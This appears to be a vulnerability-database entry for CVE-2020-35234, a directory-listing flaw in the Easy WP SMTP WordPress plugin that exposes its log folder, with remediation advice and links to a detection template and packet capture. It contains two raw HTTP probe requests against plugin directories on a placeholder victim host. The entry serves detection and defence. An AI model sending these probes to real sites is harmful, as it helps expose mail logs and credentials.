🔙 목록으로 돌아가기

CVE-2020-35234: SMTP WP Plugin Directory Listing

TitleSMTP WP Plugin Directory Listing
AuthorPR3R00T
SeverityHigh
ImpactLow: Information disclosure
RemediationUpgrade to version 1.4.3 or newer and consider disabling debug logs.
CVSS Score7.5
EPSS Score0.77656
CVE IDCVE-2020-35234
CWE IDCWE-532
Tags cve2020 cve wordpress wp-plugin smtp wp-ecommerce vkev vuln

🔍 Vulnerability Description

The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access.

🌐 HTTP Request

GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0.1 Safari/604.3.5
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-35234.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-35234.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A